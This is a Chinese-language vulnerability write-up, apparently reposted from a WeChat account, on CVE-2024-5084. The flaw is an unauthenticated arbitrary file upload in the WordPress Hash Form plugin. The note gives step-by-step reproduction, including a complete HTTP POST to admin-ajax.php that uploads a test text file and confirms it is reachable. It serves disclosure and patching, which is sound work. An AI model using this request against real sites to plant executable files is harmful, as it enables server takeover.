免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
WordPress的Hash表单任意文件上传漏洞
02
—
漏洞影响
<= 1.1.0 版本
03
—
漏洞描述
WordPress的Hash表单 - 拖放表单构建器插件由于在所有版本中缺失'file_upload_action'函数中的文件类型验证,存在任意文件上传漏洞,包括1.1.0版本。这使得未经身份验证的攻击者可以在受影响站点的服务器上上传任意文件,可能导致远程代码执行。
04
—
"/wp-content/plugins/hash-form/"
05
—
漏洞复现
第一步,请求目标网站,从body中获取ajax_nounce的值
第二步,上传文件,路径中file_uploader_nonce用第一步获取到的值,qqfile为上传文件名5a499f6e26313e19bd4049009bbed5bd为上传文件内容
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce=5ec33b3537&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile=YwlKW.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Cookie: request_a_quote_user_coockie=668e50f1d574c; PHPSESSID=6ltqhpjj2f7ciavd9s8dvh1i0e
Accept-Encoding: gzip
5a499f6e26313e19bd4049009bbed5bd
第三步,查看回显文件
http://x.x.x.x/wp-content/uploads/hashform/temp/YwlKW.txt
漏洞复现成功
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-5084漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论